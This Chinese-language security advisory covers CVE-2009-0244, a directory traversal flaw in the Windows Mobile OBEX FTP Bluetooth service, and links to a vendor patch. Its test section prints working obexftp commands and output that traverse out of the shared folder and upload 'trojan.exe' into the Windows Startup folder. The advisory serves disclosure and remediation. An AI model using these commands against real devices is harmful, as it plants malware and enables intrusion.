Microsoft Windows Mobile OBEX FTP服务目录遍历漏洞
发布日期:2009-01-20
更新日期:2009-01-21
受影响系统:Microsoft Windows Mobile 6.0
Microsoft Windows Mobile 5.0
描述:
BUGTRAQ ID:
33359
CVE(CAN) ID:
CVE-2009-0244
Windows Mobile是微软开发的用于手机等移动设备的操作系统。
大多数Windows Mobile操作系统都捆绑的Microsoft蓝牙栈,OBEX FTP是蓝牙栈中最常见的服务。
可使用OBEX FTP蓝牙服务通过蓝牙共享文件。通常该服务配置为仅共享特定的目录,用户可在该目录放置所有希望共享的文件。默认的目录为My Device\My Documents\Bluetooth Share。
OBEX FTP服务中存在目录遍历漏洞,通过认证的远程攻击者可以使用ObexFTP等工具遍历出默认蓝牙共享目录的父目录,也就是说攻击者可以浏览更低级别的文件夹、下载这些文件夹中的文件或向这些文件夹上传文件。
<*来源:Alberto Moreno Tablado
链接:
http://marc.info/?l=bugtraq&m=123247463516881&w=2
http://marc.info/?l=bugtraq&m=124722943001678&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* 在下面的示例中攻击者首先列出默认的蓝牙共享文件夹,然后在\Windows\Startup文件夹放置trojan.exe文件。
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "(null)"... <?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="" />
<file name="fotaca.jpg" created="20090119T173932Z" size="134680"/>
<file name="nota.pwi" created="20090119T175242Z" size="432"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c \
"..\\..\\Windows\\Startup\\" -p trojan.exe Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending "..\..\Windows\Inicio\"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$
建议:
厂商补丁:
Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.htc.com/asia/SupportViewNews.aspx?dl_id=609&news_id=195浏览次数:4406
严重程度:0(网友投票)